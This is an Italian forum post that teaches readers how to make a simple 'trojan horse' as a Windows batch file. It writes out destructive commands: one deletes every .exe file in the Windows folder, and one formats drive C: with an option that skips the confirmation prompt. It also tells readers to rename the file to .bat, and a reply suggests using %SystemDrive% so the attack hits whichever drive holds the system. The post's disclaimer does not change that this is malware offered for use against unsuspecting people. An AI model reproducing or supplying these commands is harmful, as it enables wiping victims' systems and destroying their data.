AVVERTENZA:
Questo articolo è stato scritto solo per scopo informativo e non per fini di lucro. Nè io nè lo Sciax2 Forum ci assumiamo responsabilità per l'uso che ne facciate. Grazie per l'attenzione!Oggi vedremo in questo post, come creare un semplice Trojan Horse (cavallo di troia), con delle semplici istruzioni dos.
Cos'è un Trojan Horse?
Un trojan o trojan horse (dall'inglese per Cavallo di Troia), è un tipo di malware. Deve il suo nome al fatto che le sue funzionalità sono nascoste all'interno di un programma apparentemente utile; è dunque l'utente stesso che installando ed eseguendo un certo programma, inconsapevolmente, installa ed esegue anche il codice trojan nascosto.All'opera!
Lo stumento che utilizzeremo per la creazione del nostro trojan horse è il notepad (blocco note per chi non lo sapesse).Bisogna però conoscere il significato di alcuni comandi dos quali:
- copy (Copia di uno o più file)
- del (Eliminazione di uno o più file)
- ren (Rinominazione di uno o più file)
- deltree (Eliminazione di un'intera directory)
- format (Formattazione di una unità)
- @ (Serve a nascondere gli echo dei comandi che vengono eseguiti)
Elimianiamo i file di windows!
Con il comando @del C:\Windows\*.exe verranno cancellati tutti file .exe presenti nella cartella Windows, rendendo windows inutilizzabile.
Formattiamo l'hard disk!
Il comando @Format C: /AUTOTEST formatta il contenuto dell'unità "C".
L'opzione /AUTOTEST serve per evitare di far apparire la conferma della formattazione, del tipo:
Attenzione! Tutti i dati sul disco rigido C: andranno persi.
Continuare [S/N].
Per completare il nostro Trojan Horse, bisognerà salvare il file, e cambiare l'estensione da .txt a .bat.
Eccezione aggiunta da: VIP-RinoDrummer
Qui attacca solo C: Però molti miei amici, dopo avergli esaminato il pc hanno come System Drive D: o E: o F:, quindi, per creare un Trojan più sicuro che funzioni possiamo utilizzare il %SystemDrive%, il %SystemDrive% verrà sostituito in automatico dal PC nel system drive ora utilizzato, per Esempio se Io ho F: e non lo sò, potrei usare questo SystemDrive
Ora vi Farò vedere come si Utilizza applicandolo alla guida:
Codice:
Perfavore,
Entra
oppure
Registrati
per vedere i codici!
------------------------------------------------------------------------------------
Fine! Miraccomando non macchiatevi il cervello...alla prossima :ciao:
Fonte:
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
Ultima modifica: